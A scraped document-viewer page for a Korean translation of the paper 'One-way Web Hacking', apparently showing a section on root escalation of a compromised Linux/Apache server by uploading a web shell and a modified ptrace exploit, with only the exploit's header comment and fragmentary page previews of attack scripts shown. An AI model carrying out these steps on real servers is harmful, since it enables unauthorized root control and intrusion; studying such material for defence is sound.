One-way Web Hacking

More documents

Recommendations

Info

이제 우리는 www1.example.com 의 완전한 통제권을 가지게 되었다. 6.2 Linux/Apache 권한 상승 이 예를 위해 우리는 2.4 커널과 Apache 1.3.27이 실행되고 있는 리눅스 서버인 www2.example.com을 살펴볼 것이다. 앞의 예에서처럼 우리는 이 서버가 이미 공격을 당했으며, 이 서버에 5.0.2 섹션에서 나왔던 upload.cgi라는 uploader 스크립트가 설치되어 있다는 것을 전제로 한다. 6.2.1 Unix 공격 툴 업로드 하기 이 서버에 대해서 우리는 4.0.1 섹션에서 설명된 것처럼 웹 기반의 command prompt인 shell.cgi와 다른 파일 ptrace1.c를 업로드할 것이다. ptrace1.c는 Linux Ptrace/Setuid Exec Vulnerability 6 기반의 권한 상승 exploit이다. 이 exploit은 onw-<strong>way</strong> 용도에 맞게 약간 수정되었다. 공격에 성공하면 root 권한의 /bin/bash에 대한 setuid 퍼미션을 제공한다. 이것은 어떤 쉘 명령도 root 권한으로 실행된다는 것을 의미한다. 웹 기반의 command prompt인 shell.cgi는 내부적으로 /bin/bash를 실행하고, 그래서 shell.cgi를 통해 실행되는 모든 명령은 root 권한으로 실행되게 된다. 수정된 ptrace exploit의 소스는 다음과 같다. /* ptrace1.c 6 http://securityfocus.com/bid/3447
* Linux kernel ptrace/kmod local root exploit * * Should work under all current 2.2.x and 2.4.x kernels. * * I discovered this stupid bug independently on January 25, 2003, that * is (almost) two month before it was fixed and published by Red Hat * and others. * * Wojciech Purczynski * * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* * IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY * * (c) 2003 Copyright by iSEC Security Research * * exploit modified for one-<strong>way</strong> use by Saumil Shah */ #include #include #include #include #include #include #include #include #include #include #include #include
Page 1 and 2:
One-way Web Hacking "Necessity is t
Page 3 and 4:
6.1.1 Windows 공격 툴 업로드
Page 5 and 6:
web application server는 스크립
Page 7 and 8:
3.0 entry point 찾기 one-way hack
Page 9 and 10:
usr/local/apache/cgi-bin/sh.cgi| sh
Page 11 and 12: 12/07/00 12:50p weblogic 12/07/00
Page 13 and 14: drwxrwxr-x 2 root root 4096 Feb 2 2
Page 15 and 16: } print "By Saumil Shah (c) net-squ
Page 17 and 18: ## uncomment the while loop below #
Page 19 and 20: # Able to send arbitrary commands t
Page 21 and 22: @commands = ("\n", "\necho 'Content
Page 23 and 24: } print S 'POST '. $file. " HTTP/1.
Page 25 and 26: C:\Inetpub\scripts>exit $ post_sh.p
Page 27 and 28: 웹 기반의 command prompt와 같
Page 29 and 30: {$errflag="Short Read: wanted $len,
Page 31 and 32: } die $@ if $errflag; if ($name) {
Page 33 and 34: 1; } } @dummy = split(/\//, $fn); $
Page 35 and 36: } sub MyBaseUrl { } local ($ret, $p
Page 37 and 38: } sub PrintEnv { } &PrintVariables(
Page 39 and 40: ASP 기반의 command prompt 스크
Page 41 and 42: %> } } } catch(IOException e) { }
Page 43 and 44: 위의 명령들은 목표 웹 서
Page 45 and 46: else { } $file = '/'; if(defined($A
Page 47 and 48: sub httpconnect { } my ($server, $p
Page 49 and 50: 5.0 File uploader 목표 웹 서버
Page 51 and 52: Else Else Else Binary = Empty Err.R
Page 53 and 54: sFrom = LCase(From) PosB = InStr(sF
Page 55 and 56: Function vbsSaveAs(FileName, ByteAr
Page 57 and 58: #!/usr/bin/perl require "cgi-lib.pl
Page 59 and 60: 권한 상승 exploit이 비상호
Page 61: 6.1.2 idq.dll - 권한 상승 다
Page 65 and 66: unsigned long * src; } int i, len;
Page 67 and 68: if (err == -1) } fatal("[-] Unable
Page 69 and 70: eturn 0; } 아래의 스크린샷
Page 71 and 72: 7.0 웹 기반의 SQL Command Promp
Page 73 and 74: --> database. Present version works
Page 75 and 76: Response.write("") Response.write("
Page 77 and 78: Response.write("") Response.write("
Page 79 and 80: Response.Write "" For F = 0 to Numb
Page 81 and 82: Query String:
Page 83 and 84: 7.4 웹 어플리케이션 도용
Page 85 and 86: 7.6 저장된 프로시저 실행
Page 87: SSL은 어플리케이션을 보호
show all

One-way Web Hacking

Create successful ePaper yourself

Delete template?

Save as template?